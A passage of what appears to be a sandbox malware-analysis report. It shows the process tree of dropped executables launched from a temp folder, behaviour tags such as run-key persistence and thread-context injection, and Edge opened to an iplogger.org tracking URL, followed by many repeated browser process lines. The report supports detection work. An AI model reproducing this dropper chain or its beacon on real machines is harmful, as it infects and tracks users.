C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0901eb1dae126e32.exeWed0901eb1dae126e32.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2280 -
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0901eb1dae126e32.exe6⤵
- Executes dropped EXE
PID:3192
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone4⤵PID:2180
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09cfb2f9758281d8.exeWed09cfb2f9758281d8.exe /mixone5⤵
- Executes dropped EXE
PID:4092 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2406⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2844
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe4⤵PID:2748
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09e95ff6b5.exeWed09e95ff6b5.exe5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2468 -
C:\Users\Public\run.exeC:\Users\Public\run.exe6⤵PID:5584
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:6932
-
C:\Users\Admin\AppData\Local\Temp\mm.exe"C:\Users\Admin\AppData\Local\Temp\mm.exe"8⤵PID:2496
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 3007⤵
- Program crash
PID:2056
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5664 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/18tji77⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4008 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a47188⤵PID:3228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:28⤵PID:2572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:88⤵PID:3988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:38⤵PID:3480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:18⤵PID:5724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:18⤵PID:4684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:18⤵PID:7972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:18⤵PID:7792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:88⤵PID:3020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:88⤵PID:5328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1348 /prefetch:18⤵PID:9372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:18⤵PID:6680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5804 /prefetch:28⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:8048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:18⤵PID:4032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:18⤵PID:9980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:18⤵PID:1208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:18⤵PID:3304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4392 /prefetch:18⤵PID:9724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:18⤵PID:10168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:18⤵PID:10744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6684 /prefetch:88⤵PID:11144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5164 /prefetch:88⤵PID:4300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6888 /prefetch:88⤵
- Modifies registry class
PID:11428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=3544 /prefetch:88⤵PID:12068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:18⤵PID:6192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:18⤵PID:1124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:18⤵PID:8184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:18⤵PID:8628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:18⤵PID:7736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:18⤵PID:9100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:18⤵PID:6592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:18⤵PID:5660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:18⤵PID:7832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:18⤵PID:8488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:18⤵PID:4060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:18⤵PID:9288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:18⤵PID:8836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:18⤵PID:6460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7300 /prefetch:18⤵PID:10052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:18⤵PID:10132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:18⤵PID:7472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7560 /prefetch:18⤵PID:11900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:18⤵PID:8524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:18⤵PID:5944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=7908 /prefetch:88⤵PID:7952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:18⤵PID:5148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=7816 /prefetch:88⤵PID:11976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:18⤵PID:7096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7392 /prefetch:18⤵PID:7092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:18⤵PID:9500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7740 /prefetch:18⤵PID:7040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8400 /prefetch:18⤵PID:1504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8564 /prefetch:18⤵PID:1404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:18⤵PID:7576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8804 /prefetch:18⤵PID:11484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1788 /prefetch:18⤵PID:4180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:18⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9152 /prefetch:18⤵PID:9376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:18⤵PID:3188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8844 /prefetch:18⤵PID:6708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8932 /prefetch:18⤵PID:9628
-
-
